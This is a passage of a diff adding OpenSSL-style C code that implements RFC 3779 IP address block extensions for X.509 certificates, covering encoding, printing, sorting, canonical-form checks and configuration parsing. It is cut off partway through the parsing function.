+ * Hudson (tjh@cryptsoft.com).
+ */
+
+/*
+ * Implementation of RFC 3779 section 2.2.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/buffer.h>
+#include <openssl/x509v3.h>
+
+#ifndef OPENSSL_NO_RFC3779
+
+/*
+ * OpenSSL ASN.1 template translation of RFC 3779 2.2.3.
+ */
+
+ASN1_SEQUENCE(IPAddressRange) = {
+  ASN1_SIMPLE(IPAddressRange, min, ASN1_BIT_STRING),
+  ASN1_SIMPLE(IPAddressRange, max, ASN1_BIT_STRING)
+} ASN1_SEQUENCE_END(IPAddressRange)
+
+ASN1_CHOICE(IPAddressOrRange) = {
+  ASN1_SIMPLE(IPAddressOrRange, u.addressPrefix, ASN1_BIT_STRING),
+  ASN1_SIMPLE(IPAddressOrRange, u.addressRange,  IPAddressRange)
+} ASN1_CHOICE_END(IPAddressOrRange)
+
+ASN1_CHOICE(IPAddressChoice) = {
+  ASN1_SIMPLE(IPAddressChoice,      u.inherit,           ASN1_NULL),
+  ASN1_SEQUENCE_OF(IPAddressChoice, u.addressesOrRanges, IPAddressOrRange)
+} ASN1_CHOICE_END(IPAddressChoice)
+
+ASN1_SEQUENCE(IPAddressFamily) = {
+  ASN1_SIMPLE(IPAddressFamily, addressFamily,   ASN1_OCTET_STRING),
+  ASN1_SIMPLE(IPAddressFamily, ipAddressChoice, IPAddressChoice)
+} ASN1_SEQUENCE_END(IPAddressFamily)
+
+ASN1_ITEM_TEMPLATE(IPAddrBlocks) =
+  ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0,
+                        IPAddrBlocks, IPAddressFamily)
+ASN1_ITEM_TEMPLATE_END(IPAddrBlocks)
+
+IMPLEMENT_ASN1_FUNCTIONS(IPAddressRange)
+IMPLEMENT_ASN1_FUNCTIONS(IPAddressOrRange)
+IMPLEMENT_ASN1_FUNCTIONS(IPAddressChoice)
+IMPLEMENT_ASN1_FUNCTIONS(IPAddressFamily)
+
+/*
+ * How much buffer space do we need for a raw address?
+ */
+# define ADDR_RAW_BUF_LEN        16
+
+/*
+ * What's the address length associated with this AFI?
+ */
+static int length_from_afi(const unsigned afi)
+{
+    switch (afi) {
+    case IANA_AFI_IPV4:
+        return 4;
+    case IANA_AFI_IPV6:
+        return 16;
+    default:
+        return 0;
+    }
+}
+
+/*
+ * Extract the AFI from an IPAddressFamily.
+ */
+unsigned int v3_addr_get_afi(const IPAddressFamily *f)
+{
+    return ((f != NULL &&
+             f->addressFamily != NULL && f->addressFamily->data != NULL)
+            ? ((f->addressFamily->data[0] << 8) | (f->addressFamily->data[1]))
+            : 0);
+}
+
+/*
+ * Expand the bitstring form of an address into a raw byte array.
+ * At the moment this is coded for simplicity, not speed.
+ */
+static int addr_expand(unsigned char *addr,
+                       const ASN1_BIT_STRING *bs,
+                       const int length, const unsigned char fill)
+{
+    if (bs->length < 0 || bs->length > length)
+        return 0;
+    if (bs->length > 0) {
+        memcpy(addr, bs->data, bs->length);
+        if ((bs->flags & 7) != 0) {
+            unsigned char mask = 0xFF >> (8 - (bs->flags & 7));
+            if (fill == 0)
+                addr[bs->length - 1] &= ~mask;
+            else
+                addr[bs->length - 1] |= mask;
+        }
+    }
+    memset(addr + bs->length, fill, length - bs->length);
+    return 1;
+}
+
+/*
+ * Extract the prefix length from a bitstring.
+ */
+# define addr_prefixlen(bs) ((int) ((bs)->length * 8 - ((bs)->flags & 7)))
+
+/*
+ * i2r handler for one address bitstring.
+ */
+static int i2r_address(BIO *out,
+                       const unsigned afi,
+                       const unsigned char fill, const ASN1_BIT_STRING *bs)
+{
+    unsigned char addr[ADDR_RAW_BUF_LEN];
+    int i, n;
+
+    if (bs->length < 0)
+        return 0;
+    switch (afi) {
+    case IANA_AFI_IPV4:
+        if (!addr_expand(addr, bs, 4, fill))
+            return 0;
+        BIO_printf(out, "%d.%d.%d.%d", addr[0], addr[1], addr[2], addr[3]);
+        break;
+    case IANA_AFI_IPV6:
+        if (!addr_expand(addr, bs, 16, fill))
+            return 0;
+        for (n = 16; n > 1 && addr[n - 1] == 0x00 && addr[n - 2] == 0x00;
+             n -= 2) ;
+        for (i = 0; i < n; i += 2)
+            BIO_printf(out, "%x%s", (addr[i] << 8) | addr[i + 1],
+                       (i < 14 ? ":" : ""));
+        if (i < 16)
+            BIO_puts(out, ":");
+        if (i == 0)
+            BIO_puts(out, ":");
+        break;
+    default:
+        for (i = 0; i < bs->length; i++)
+            BIO_printf(out, "%s%02x", (i > 0 ? ":" : ""), bs->data[i]);
+        BIO_printf(out, "[%d]", (int)(bs->flags & 7));
+        break;
+    }
+    return 1;
+}
+
+/*
+ * i2r handler for a sequence of addresses and ranges.
+ */
+static int i2r_IPAddressOrRanges(BIO *out,
+                                 const int indent,
+                                 const IPAddressOrRanges *aors,
+                                 const unsigned afi)
+{
+    int i;
+    for (i = 0; i < sk_IPAddressOrRange_num(aors); i++) {
+        const IPAddressOrRange *aor = sk_IPAddressOrRange_value(aors, i);
+        BIO_printf(out, "%*s", indent, "");
+        switch (aor->type) {
+        case IPAddressOrRange_addressPrefix:
+            if (!i2r_address(out, afi, 0x00, aor->u.addressPrefix))
+                return 0;
+            BIO_printf(out, "/%d\n", addr_prefixlen(aor->u.addressPrefix));
+            continue;
+        case IPAddressOrRange_addressRange:
+            if (!i2r_address(out, afi, 0x00, aor->u.addressRange->min))
+                return 0;
+            BIO_puts(out, "-");
+            if (!i2r_address(out, afi, 0xFF, aor->u.addressRange->max))
+                return 0;
+            BIO_puts(out, "\n");
+            continue;
+        }
+    }
+    return 1;
+}
+
+/*
+ * i2r handler for an IPAddrBlocks extension.
+ */
+static int i2r_IPAddrBlocks(const X509V3_EXT_METHOD *method,
+                            void *ext, BIO *out, int indent)
+{
+    const IPAddrBlocks *addr = ext;
+    int i;
+    for (i = 0; i < sk_IPAddressFamily_num(addr); i++) {
+        IPAddressFamily *f = sk_IPAddressFamily_value(addr, i);
+        const unsigned int afi = v3_addr_get_afi(f);
+        switch (afi) {
+        case IANA_AFI_IPV4:
+            BIO_printf(out, "%*sIPv4", indent, "");
+            break;
+        case IANA_AFI_IPV6:
+            BIO_printf(out, "%*sIPv6", indent, "");
+            break;
+        default:
+            BIO_printf(out, "%*sUnknown AFI %u", indent, "", afi);
+            break;
+        }
+        if (f->addressFamily->length > 2) {
+            switch (f->addressFamily->data[2]) {
+            case 1:
+                BIO_puts(out, " (Unicast)");
+                break;
+            case 2:
+                BIO_puts(out, " (Multicast)");
+                break;
+            case 3:
+                BIO_puts(out, " (Unicast/Multicast)");
+                break;
+            case 4:
+                BIO_puts(out, " (MPLS)");
+                break;
+            case 64:
+                BIO_puts(out, " (Tunnel)");
+                break;
+            case 65:
+                BIO_puts(out, " (VPLS)");
+                break;
+            case 66:
+                BIO_puts(out, " (BGP MDT)");
+                break;
+            case 128:
+                BIO_puts(out, " (MPLS-labeled VPN)");
+                break;
+            default:
+                BIO_printf(out, " (Unknown SAFI %u)",
+                           (unsigned)f->addressFamily->data[2]);
+                break;
+            }
+        }
+        switch (f->ipAddressChoice->type) {
+        case IPAddressChoice_inherit:
+            BIO_puts(out, ": inherit\n");
+            break;
+        case IPAddressChoice_addressesOrRanges:
+            BIO_puts(out, ":\n");
+            if (!i2r_IPAddressOrRanges(out,
+                                       indent + 2,
+                                       f->ipAddressChoice->
+                                       u.addressesOrRanges, afi))
+                return 0;
+            break;
+        }
+    }
+    return 1;
+}
+
+/*
+ * Sort comparison function for a sequence of IPAddressOrRange
+ * elements.
+ *
+ * There's no sane answer we can give if addr_expand() fails, and an
+ * assertion failure on externally supplied data is seriously uncool,
+ * so we just arbitrarily declare that if given invalid inputs this
+ * function returns -1.  If this messes up your preferred sort order
+ * for garbage input, tough noogies.
+ */
+static int IPAddressOrRange_cmp(const IPAddressOrRange *a,
+                                const IPAddressOrRange *b, const int length)
+{
+    unsigned char addr_a[ADDR_RAW_BUF_LEN], addr_b[ADDR_RAW_BUF_LEN];
+    int prefixlen_a = 0, prefixlen_b = 0;
+    int r;
+
+    switch (a->type) {
+    case IPAddressOrRange_addressPrefix:
+        if (!addr_expand(addr_a, a->u.addressPrefix, length, 0x00))
+            return -1;
+        prefixlen_a = addr_prefixlen(a->u.addressPrefix);
+        break;
+    case IPAddressOrRange_addressRange:
+        if (!addr_expand(addr_a, a->u.addressRange->min, length, 0x00))
+            return -1;
+        prefixlen_a = length * 8;
+        break;
+    }
+
+    switch (b->type) {
+    case IPAddressOrRange_addressPrefix:
+        if (!addr_expand(addr_b, b->u.addressPrefix, length, 0x00))
+            return -1;
+        prefixlen_b = addr_prefixlen(b->u.addressPrefix);
+        break;
+    case IPAddressOrRange_addressRange:
+        if (!addr_expand(addr_b, b->u.addressRange->min, length, 0x00))
+            return -1;
+        prefixlen_b = length * 8;
+        break;
+    }
+
+    if ((r = memcmp(addr_a, addr_b, length)) != 0)
+        return r;
+    else
+        return prefixlen_a - prefixlen_b;
+}
+
+/*
+ * IPv4-specific closure over IPAddressOrRange_cmp, since sk_sort()
+ * comparision routines are only allowed two arguments.
+ */
+static int v4IPAddressOrRange_cmp(const IPAddressOrRange *const *a,
+                                  const IPAddressOrRange *const *b)
+{
+    return IPAddressOrRange_cmp(*a, *b, 4);
+}
+
+/*
+ * IPv6-specific closure over IPAddressOrRange_cmp, since sk_sort()
+ * comparision routines are only allowed two arguments.
+ */
+static int v6IPAddressOrRange_cmp(const IPAddressOrRange *const *a,
+                                  const IPAddressOrRange *const *b)
+{
+    return IPAddressOrRange_cmp(*a, *b, 16);
+}
+
+/*
+ * Calculate whether a range collapses to a prefix.
+ * See last paragraph of RFC 3779 2.2.3.7.
+ */
+static int range_should_be_prefix(const unsigned char *min,
+                                  const unsigned char *max, const int length)
+{
+    unsigned char mask;
+    int i, j;
+
+    OPENSSL_assert(memcmp(min, max, length) <= 0);
+    for (i = 0; i < length && min[i] == max[i]; i++) ;
+    for (j = length - 1; j >= 0 && min[j] == 0x00 && max[j] == 0xFF; j--) ;
+    if (i < j)
+        return -1;
+    if (i > j)
+        return i * 8;
+    mask = min[i] ^ max[i];
+    switch (mask) {
+    case 0x01:
+        j = 7;
+        break;
+    case 0x03:
+        j = 6;
+        break;
+    case 0x07:
+        j = 5;
+        break;
+    case 0x0F:
+        j = 4;
+        break;
+    case 0x1F:
+        j = 3;
+        break;
+    case 0x3F:
+        j = 2;
+        break;
+    case 0x7F:
+        j = 1;
+        break;
+    default:
+        return -1;
+    }
+    if ((min[i] & mask) != 0 || (max[i] & mask) != mask)
+        return -1;
+    else
+        return i * 8 + j;
+}
+
+/*
+ * Construct a prefix.
+ */
+static int make_addressPrefix(IPAddressOrRange **result,
+                              unsigned char *addr, const int prefixlen)
+{
+    int bytelen = (prefixlen + 7) / 8, bitlen = prefixlen % 8;
+    IPAddressOrRange *aor = IPAddressOrRange_new();
+
+    if (aor == NULL)
+        return 0;
+    aor->type = IPAddressOrRange_addressPrefix;
+    if (aor->u.addressPrefix == NULL &&
+        (aor->u.addressPrefix = ASN1_BIT_STRING_new()) == NULL)
+        goto err;
+    if (!ASN1_BIT_STRING_set(aor->u.addressPrefix, addr, bytelen))
+        goto err;
+    aor->u.addressPrefix->flags &= ~7;
+    aor->u.addressPrefix->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+    if (bitlen > 0) {
+        aor->u.addressPrefix->data[bytelen - 1] &= ~(0xFF >> bitlen);
+        aor->u.addressPrefix->flags |= 8 - bitlen;
+    }
+
+    *result = aor;
+    return 1;
+
+ err:
+    IPAddressOrRange_free(aor);
+    return 0;
+}
+
+/*
+ * Construct a range.  If it can be expressed as a prefix,
+ * return a prefix instead.  Doing this here simplifies
+ * the rest of the code considerably.
+ */
+static int make_addressRange(IPAddressOrRange **result,
+                             unsigned char *min,
+                             unsigned char *max, const int length)
+{
+    IPAddressOrRange *aor;
+    int i, prefixlen;
+
+    if ((prefixlen = range_should_be_prefix(min, max, length)) >= 0)
+        return make_addressPrefix(result, min, prefixlen);
+
+    if ((aor = IPAddressOrRange_new()) == NULL)
+        return 0;
+    aor->type = IPAddressOrRange_addressRange;
+    OPENSSL_assert(aor->u.addressRange == NULL);
+    if ((aor->u.addressRange = IPAddressRange_new()) == NULL)
+        goto err;
+    if (aor->u.addressRange->min == NULL &&
+        (aor->u.addressRange->min = ASN1_BIT_STRING_new()) == NULL)
+        goto err;
+    if (aor->u.addressRange->max == NULL &&
+        (aor->u.addressRange->max = ASN1_BIT_STRING_new()) == NULL)
+        goto err;
+
+    for (i = length; i > 0 && min[i - 1] == 0x00; --i) ;
+    if (!ASN1_BIT_STRING_set(aor->u.addressRange->min, min, i))
+        goto err;
+    aor->u.addressRange->min->flags &= ~7;
+    aor->u.addressRange->min->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+    if (i > 0) {
+        unsigned char b = min[i - 1];
+        int j = 1;
+        while ((b & (0xFFU >> j)) != 0)
+            ++j;
+        aor->u.addressRange->min->flags |= 8 - j;
+    }
+
+    for (i = length; i > 0 && max[i - 1] == 0xFF; --i) ;
+    if (!ASN1_BIT_STRING_set(aor->u.addressRange->max, max, i))
+        goto err;
+    aor->u.addressRange->max->flags &= ~7;
+    aor->u.addressRange->max->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+    if (i > 0) {
+        unsigned char b = max[i - 1];
+        int j = 1;
+        while ((b & (0xFFU >> j)) != (0xFFU >> j))
+            ++j;
+        aor->u.addressRange->max->flags |= 8 - j;
+    }
+
+    *result = aor;
+    return 1;
+
+ err:
+    IPAddressOrRange_free(aor);
+    return 0;
+}
+
+/*
+ * Construct a new address family or find an existing one.
+ */
+static IPAddressFamily *make_IPAddressFamily(IPAddrBlocks *addr,
+                                             const unsigned afi,
+                                             const unsigned *safi)
+{
+    IPAddressFamily *f;
+    unsigned char key[3];
+    unsigned keylen;
+    int i;
+
+    key[0] = (afi >> 8) & 0xFF;
+    key[1] = afi & 0xFF;
+    if (safi != NULL) {
+        key[2] = *safi & 0xFF;
+        keylen = 3;
+    } else {
+        keylen = 2;
+    }
+
+    for (i = 0; i < sk_IPAddressFamily_num(addr); i++) {
+        f = sk_IPAddressFamily_value(addr, i);
+        OPENSSL_assert(f->addressFamily->data != NULL);
+        if (f->addressFamily->length == keylen &&
+            !memcmp(f->addressFamily->data, key, keylen))
+            return f;
+    }
+
+    if ((f = IPAddressFamily_new()) == NULL)
+        goto err;
+    if (f->ipAddressChoice == NULL &&
+        (f->ipAddressChoice = IPAddressChoice_new()) == NULL)
+        goto err;
+    if (f->addressFamily == NULL &&
+        (f->addressFamily = ASN1_OCTET_STRING_new()) == NULL)
+        goto err;
+    if (!ASN1_OCTET_STRING_set(f->addressFamily, key, keylen))
+        goto err;
+    if (!sk_IPAddressFamily_push(addr, f))
+        goto err;
+
+    return f;
+
+ err:
+    IPAddressFamily_free(f);
+    return NULL;
+}
+
+/*
+ * Add an inheritance element.
+ */
+int v3_addr_add_inherit(IPAddrBlocks *addr,
+                        const unsigned afi, const unsigned *safi)
+{
+    IPAddressFamily *f = make_IPAddressFamily(addr, afi, safi);
+    if (f == NULL ||
+        f->ipAddressChoice == NULL ||
+        (f->ipAddressChoice->type == IPAddressChoice_addressesOrRanges &&
+         f->ipAddressChoice->u.addressesOrRanges != NULL))
+        return 0;
+    if (f->ipAddressChoice->type == IPAddressChoice_inherit &&
+        f->ipAddressChoice->u.inherit != NULL)
+        return 1;
+    if (f->ipAddressChoice->u.inherit == NULL &&
+        (f->ipAddressChoice->u.inherit = ASN1_NULL_new()) == NULL)
+        return 0;
+    f->ipAddressChoice->type = IPAddressChoice_inherit;
+    return 1;
+}
+
+/*
+ * Construct an IPAddressOrRange sequence, or return an existing one.
+ */
+static IPAddressOrRanges *make_prefix_or_range(IPAddrBlocks *addr,
+                                               const unsigned afi,
+                                               const unsigned *safi)
+{
+    IPAddressFamily *f = make_IPAddressFamily(addr, afi, safi);
+    IPAddressOrRanges *aors = NULL;
+
+    if (f == NULL ||
+        f->ipAddressChoice == NULL ||
+        (f->ipAddressChoice->type == IPAddressChoice_inherit &&
+         f->ipAddressChoice->u.inherit != NULL))
+        return NULL;
+    if (f->ipAddressChoice->type == IPAddressChoice_addressesOrRanges)
+        aors = f->ipAddressChoice->u.addressesOrRanges;
+    if (aors != NULL)
+        return aors;
+    if ((aors = sk_IPAddressOrRange_new_null()) == NULL)
+        return NULL;
+    switch (afi) {
+    case IANA_AFI_IPV4:
+        (void)sk_IPAddressOrRange_set_cmp_func(aors, v4IPAddressOrRange_cmp);
+        break;
+    case IANA_AFI_IPV6:
+        (void)sk_IPAddressOrRange_set_cmp_func(aors, v6IPAddressOrRange_cmp);
+        break;
+    }
+    f->ipAddressChoice->type = IPAddressChoice_addressesOrRanges;
+    f->ipAddressChoice->u.addressesOrRanges = aors;
+    return aors;
+}
+
+/*
+ * Add a prefix.
+ */
+int v3_addr_add_prefix(IPAddrBlocks *addr,
+                       const unsigned afi,
+                       const unsigned *safi,
+                       unsigned char *a, const int prefixlen)
+{
+    IPAddressOrRanges *aors = make_prefix_or_range(addr, afi, safi);
+    IPAddressOrRange *aor;
+    if (aors == NULL || !make_addressPrefix(&aor, a, prefixlen))
+        return 0;
+    if (sk_IPAddressOrRange_push(aors, aor))
+        return 1;
+    IPAddressOrRange_free(aor);
+    return 0;
+}
+
+/*
+ * Add a range.
+ */
+int v3_addr_add_range(IPAddrBlocks *addr,
+                      const unsigned afi,
+                      const unsigned *safi,
+                      unsigned char *min, unsigned char *max)
+{
+    IPAddressOrRanges *aors = make_prefix_or_range(addr, afi, safi);
+    IPAddressOrRange *aor;
+    int length = length_from_afi(afi);
+    if (aors == NULL)
+        return 0;
+    if (!make_addressRange(&aor, min, max, length))
+        return 0;
+    if (sk_IPAddressOrRange_push(aors, aor))
+        return 1;
+    IPAddressOrRange_free(aor);
+    return 0;
+}
+
+/*
+ * Extract min and max values from an IPAddressOrRange.
+ */
+static int extract_min_max(IPAddressOrRange *aor,
+                           unsigned char *min, unsigned char *max, int length)
+{
+    if (aor == NULL || min == NULL || max == NULL)
+        return 0;
+    switch (aor->type) {
+    case IPAddressOrRange_addressPrefix:
+        return (addr_expand(min, aor->u.addressPrefix, length, 0x00) &&
+                addr_expand(max, aor->u.addressPrefix, length, 0xFF));
+    case IPAddressOrRange_addressRange:
+        return (addr_expand(min, aor->u.addressRange->min, length, 0x00) &&
+                addr_expand(max, aor->u.addressRange->max, length, 0xFF));
+    }
+    return 0;
+}
+
+/*
+ * Public wrapper for extract_min_max().
+ */
+int v3_addr_get_range(IPAddressOrRange *aor,
+                      const unsigned afi,
+                      unsigned char *min,
+                      unsigned char *max, const int length)
+{
+    int afi_length = length_from_afi(afi);
+    if (aor == NULL || min == NULL || max == NULL ||
+        afi_length == 0 || length < afi_length ||
+        (aor->type != IPAddressOrRange_addressPrefix &&
+         aor->type != IPAddressOrRange_addressRange) ||
+        !extract_min_max(aor, min, max, afi_length))
+        return 0;
+
+    return afi_length;
+}
+
+/*
+ * Sort comparision function for a sequence of IPAddressFamily.
+ *
+ * The last paragraph of RFC 3779 2.2.3.3 is slightly ambiguous about
+ * the ordering: I can read it as meaning that IPv6 without a SAFI
+ * comes before IPv4 with a SAFI, which seems pretty weird.  The
+ * examples in appendix B suggest that the author intended the
+ * null-SAFI rule to apply only within a single AFI, which is what I
+ * would have expected and is what the following code implements.
+ */
+static int IPAddressFamily_cmp(const IPAddressFamily *const *a_,
+                               const IPAddressFamily *const *b_)
+{
+    const ASN1_OCTET_STRING *a = (*a_)->addressFamily;
+    const ASN1_OCTET_STRING *b = (*b_)->addressFamily;
+    int len = ((a->length <= b->length) ? a->length : b->length);
+    int cmp = memcmp(a->data, b->data, len);
+    return cmp ? cmp : a->length - b->length;
+}
+
+/*
+ * Check whether an IPAddrBLocks is in canonical form.
+ */
+int v3_addr_is_canonical(IPAddrBlocks *addr)
+{
+    unsigned char a_min[ADDR_RAW_BUF_LEN], a_max[ADDR_RAW_BUF_LEN];
+    unsigned char b_min[ADDR_RAW_BUF_LEN], b_max[ADDR_RAW_BUF_LEN];
+    IPAddressOrRanges *aors;
+    int i, j, k;
+
+    /*
+     * Empty extension is cannonical.
+     */
+    if (addr == NULL)
+        return 1;
+
+    /*
+     * Check whether the top-level list is in order.
+     */
+    for (i = 0; i < sk_IPAddressFamily_num(addr) - 1; i++) {
+        const IPAddressFamily *a = sk_IPAddressFamily_value(addr, i);
+        const IPAddressFamily *b = sk_IPAddressFamily_value(addr, i + 1);
+        if (IPAddressFamily_cmp(&a, &b) >= 0)
+            return 0;
+    }
+
+    /*
+     * Top level's ok, now check each address family.
+     */
+    for (i = 0; i < sk_IPAddressFamily_num(addr); i++) {
+        IPAddressFamily *f = sk_IPAddressFamily_value(addr, i);
+        int length = length_from_afi(v3_addr_get_afi(f));
+
+        /*
+         * Inheritance is canonical.  Anything other than inheritance or
+         * a SEQUENCE OF IPAddressOrRange is an ASN.1 error or something.
+         */
+        if (f == NULL || f->ipAddressChoice == NULL)
+            return 0;
+        switch (f->ipAddressChoice->type) {
+        case IPAddressChoice_inherit:
+            continue;
+        case IPAddressChoice_addressesOrRanges:
+            break;
+        default:
+            return 0;
+        }
+
+        /*
+         * It's an IPAddressOrRanges sequence, check it.
+         */
+        aors = f->ipAddressChoice->u.addressesOrRanges;
+        if (sk_IPAddressOrRange_num(aors) == 0)
+            return 0;
+        for (j = 0; j < sk_IPAddressOrRange_num(aors) - 1; j++) {
+            IPAddressOrRange *a = sk_IPAddressOrRange_value(aors, j);
+            IPAddressOrRange *b = sk_IPAddressOrRange_value(aors, j + 1);
+
+            if (!extract_min_max(a, a_min, a_max, length) ||
+                !extract_min_max(b, b_min, b_max, length))
+                return 0;
+
+            /*
+             * Punt misordered list, overlapping start, or inverted range.
+             */
+            if (memcmp(a_min, b_min, length) >= 0 ||
+                memcmp(a_min, a_max, length) > 0 ||
+                memcmp(b_min, b_max, length) > 0)
+                return 0;
+
+            /*
+             * Punt if adjacent or overlapping.  Check for adjacency by
+             * subtracting one from b_min first.
+             */
+            for (k = length - 1; k >= 0 && b_min[k]-- == 0x00; k--) ;
+            if (memcmp(a_max, b_min, length) >= 0)
+                return 0;
+
+            /*
+             * Check for range that should be expressed as a prefix.
+             */
+            if (a->type == IPAddressOrRange_addressRange &&
+                range_should_be_prefix(a_min, a_max, length) >= 0)
+                return 0;
+        }
+
+        /*
+         * Check range to see if it's inverted or should be a
+         * prefix.
+         */
+        j = sk_IPAddressOrRange_num(aors) - 1;
+        {
+            IPAddressOrRange *a = sk_IPAddressOrRange_value(aors, j);
+            if (a != NULL && a->type == IPAddressOrRange_addressRange) {
+                if (!extract_min_max(a, a_min, a_max, length))
+                    return 0;
+                if (memcmp(a_min, a_max, length) > 0 ||
+                    range_should_be_prefix(a_min, a_max, length) >= 0)
+                    return 0;
+            }
+        }
+    }
+
+    /*
+     * If we made it through all that, we're happy.
+     */
+    return 1;
+}
+
+/*
+ * Whack an IPAddressOrRanges into canonical form.
+ */
+static int IPAddressOrRanges_canonize(IPAddressOrRanges *aors,
+                                      const unsigned afi)
+{
+    int i, j, length = length_from_afi(afi);
+
+    /*
+     * Sort the IPAddressOrRanges sequence.
+     */
+    sk_IPAddressOrRange_sort(aors);
+
+    /*
+     * Clean up representation issues, punt on duplicates or overlaps.
+     */
+    for (i = 0; i < sk_IPAddressOrRange_num(aors) - 1; i++) {
+        IPAddressOrRange *a = sk_IPAddressOrRange_value(aors, i);
+        IPAddressOrRange *b = sk_IPAddressOrRange_value(aors, i + 1);
+        unsigned char a_min[ADDR_RAW_BUF_LEN], a_max[ADDR_RAW_BUF_LEN];
+        unsigned char b_min[ADDR_RAW_BUF_LEN], b_max[ADDR_RAW_BUF_LEN];
+
+        if (!extract_min_max(a, a_min, a_max, length) ||
+            !extract_min_max(b, b_min, b_max, length))
+            return 0;
+
+        /*
+         * Punt inverted ranges.
+         */
+        if (memcmp(a_min, a_max, length) > 0 ||
+            memcmp(b_min, b_max, length) > 0)
+            return 0;
+
+        /*
+         * Punt overlaps.
+         */
+        if (memcmp(a_max, b_min, length) >= 0)
+            return 0;
+
+        /*
+         * Merge if a and b are adjacent.  We check for
+         * adjacency by subtracting one from b_min first.
+         */
+        for (j = length - 1; j >= 0 && b_min[j]-- == 0x00; j--) ;
+        if (memcmp(a_max, b_min, length) == 0) {
+            IPAddressOrRange *merged;
+            if (!make_addressRange(&merged, a_min, b_max, length))
+                return 0;
+            (void)sk_IPAddressOrRange_set(aors, i, merged);
+            (void)sk_IPAddressOrRange_delete(aors, i + 1);
+            IPAddressOrRange_free(a);
+            IPAddressOrRange_free(b);
+            --i;
+            continue;
+        }
+    }
+
+    /*
+     * Check for inverted final range.
+     */
+    j = sk_IPAddressOrRange_num(aors) - 1;
+    {
+        IPAddressOrRange *a = sk_IPAddressOrRange_value(aors, j);
+        if (a != NULL && a->type == IPAddressOrRange_addressRange) {
+            unsigned char a_min[ADDR_RAW_BUF_LEN], a_max[ADDR_RAW_BUF_LEN];
+            extract_min_max(a, a_min, a_max, length);
+            if (memcmp(a_min, a_max, length) > 0)
+                return 0;
+        }
+    }
+
+    return 1;
+}
+
+/*
+ * Whack an IPAddrBlocks extension into canonical form.
+ */
+int v3_addr_canonize(IPAddrBlocks *addr)
+{
+    int i;
+    for (i = 0; i < sk_IPAddressFamily_num(addr); i++) {
+        IPAddressFamily *f = sk_IPAddressFamily_value(addr, i);
+        if (f->ipAddressChoice->type == IPAddressChoice_addressesOrRanges &&
+            !IPAddressOrRanges_canonize(f->ipAddressChoice->
+                                        u.addressesOrRanges,
+                                        v3_addr_get_afi(f)))
+            return 0;
+    }
+    (void)sk_IPAddressFamily_set_cmp_func(addr, IPAddressFamily_cmp);
+    sk_IPAddressFamily_sort(addr);
+    OPENSSL_assert(v3_addr_is_canonical(addr));
+    return 1;
+}
+
+/*
+ * v2i handler for the IPAddrBlocks extension.
+ */
+static void *v2i_IPAddrBlocks(const struct v3_ext_method *method,
+                              struct v3_ext_ctx *ctx,
+                              STACK_OF(CONF_VALUE) *values)
+{
+    static const char v4addr_chars[] = "0123456789.";
+    static const char v6addr_chars[] = "0123456789.:abcdefABCDEF";
+    IPAddrBlocks *addr = NULL;
+    char *s = NULL, *t;
+    int i;
+
+    if ((addr = sk_IPAddressFamily_new(IPAddressFamily_cmp)) == NULL) {
+        X509V3err(X509V3_F_V2I_IPADDRBLOCKS, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    for (i = 0; i < sk_CONF_VALUE_num(values); i++) {
+        CONF_VALUE *val = sk_CONF_VALUE_value(values, i);
+        unsigned char min[ADDR_RAW_BUF_LEN], max[ADDR_RAW_BUF_LEN];
+        unsigned afi, *safi = NULL, safi_;
+        const char *addr_chars;
+        int prefixlen, i1, i2, delim, length;
+
+        if (!name_cmp(val->name, "IPv4")) {
+            afi = IANA_AFI_IPV4;
+        } else if (!name_cmp(val->name, "IPv6")) {
+            afi = IANA_AFI_IPV6;
+        } else if (!name_cmp(val->name, "IPv4-SAFI")) {
+            afi = IANA_AFI_IPV4;
+            safi = &safi_;
+        } else if (!name_cmp(val->name, "IPv6-SAFI")) {
+            afi = IANA_AFI_IPV6;
+            safi = &safi_;
+        } else {
+            X509V3err(X509V3_F_V2I_IPADDRBLOCKS,
+                      X509V3_R_EXTENSION_NAME_ERROR);
+            X509V3_conf_err(val);
+            goto err;
+        }
+
+        switch (afi) {
+        case IANA_AFI_IPV4:
+            addr_chars = v4addr_chars;
+            break;
+        case IANA_AFI_IPV6:
+            addr_chars = v6addr_chars;
+            break;
+        }
+
+        length = length_from_afi(afi);
+
+        /*
+         * Handle SAFI, if any, and BUF_strdup() so we can null-terminate
+         * the other input values.
+         */
+        if (safi != NULL) {
+            *safi = strtoul(val->value, &t, 0);
+            t += strspn(t, " \t");
+            if (*safi > 0xFF || *t++ != ':') {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS, X509V3_R_INVALID_SAFI);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            t += strspn(t, " \t");
+            s = BUF_strdup(t);
+        } else {
+            s = BUF_strdup(val->value);
+        }
+        if (s == NULL) {
+            X509V3err(X509V3_F_V2I_IPADDRBLOCKS, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /*
+         * Check for inheritance.  Not worth additional complexity to
+         * optimize this (seldom-used) case.
+         */
+        if (!strcmp(s, "inherit")) {
+            if (!v3_addr_add_inherit(addr, afi, safi)) {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS,
+                          X509V3_R_INVALID_INHERITANCE);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            OPENSSL_free(s);
+            s = NULL;
+            continue;
+        }
+
+        i1 = strspn(s, addr_chars);
+        i2 = i1 + strspn(s + i1, " \t");
+        delim = s[i2++];
+        s[i1] = '\0';
+
+        if (a2i_ipadd(min, s) != length) {
+            X509V3err(X509V3_F_V2I_IPADDRBLOCKS, X509V3_R_INVALID_IPADDRESS);
+            X509V3_conf_err(val);
+            goto err;
+        }
+
+        switch (delim) {
+        case '/':
+            prefixlen = (int)strtoul(s + i2, &t, 10);
+            if (t == s + i2 || *t != '\0') {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS,
+                          X509V3_R_EXTENSION_VALUE_ERROR);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            if (!v3_addr_add_prefix(addr, afi, safi, min, prefixlen)) {
+                X509V3err(X509V3_F_V2I_IPADDRBLOCKS, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            break;
+        case '-':
